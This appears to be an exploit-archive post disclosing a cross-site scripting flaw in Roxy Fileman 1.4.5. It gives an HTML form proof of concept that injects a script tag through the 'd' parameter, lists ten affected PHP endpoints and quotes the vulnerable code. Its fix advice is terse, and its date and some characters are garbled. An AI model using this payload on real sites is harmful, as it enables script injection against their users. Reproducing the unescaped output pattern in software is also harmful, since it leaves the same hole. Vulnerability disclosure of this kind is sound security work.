Roxy Fileman Cross Site Scripting

Posted on 30 November -0001
<HTML><HEAD><TITLE>Roxy Fileman Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================|
| Exploit Title:  Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on:  Kali Linux 
|
| Date: 1 /12 / 2017
*=============================================================|
| Exploit Code: 
| 
|<HTML>
|<HEAD>
|    <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
| <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/>
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET & POST
| Files that have this vulnerability :
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables ØŒ After use command echo in script :)
|
*=======================|
|Vulnerable code For Example:
|
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
|  $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|echo '[';
|foreach ($files as $f){
|  $fullPath = $path.'/'.$f;
|  if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
|    continue;
|  $size = filesize(fixPath($fullPath));
|  $time = filemtime(fixPath($fullPath));
|  $w = 0;
|  $h = 0;
|  if(RoxyFile::IsImage($f)){
|    $tmp = @getimagesize(fixPath($fullPath));
|    if($tmp){
|      $w = $tmp[0];
|      $h = $tmp[1];
|    }
|  }
|  $str .= '{"p":"'.mb_ereg_replace('"', '"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>  
*=============================================================|
| Special Thanks To : Ehsan Cod3r ØŒ micle ØŒ Und3rgr0und ØŒ Amir.ght ØŒ
| xenotixØŒ modiretØŒ V For Vendetta ØŒ Alireza ØŒ r4ouf ØŒ Spoofer ØŒ
| And All Of My Friends ØŒ The Last One : My Self, M.R.S.L.Y  
*=============================================================|  </BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20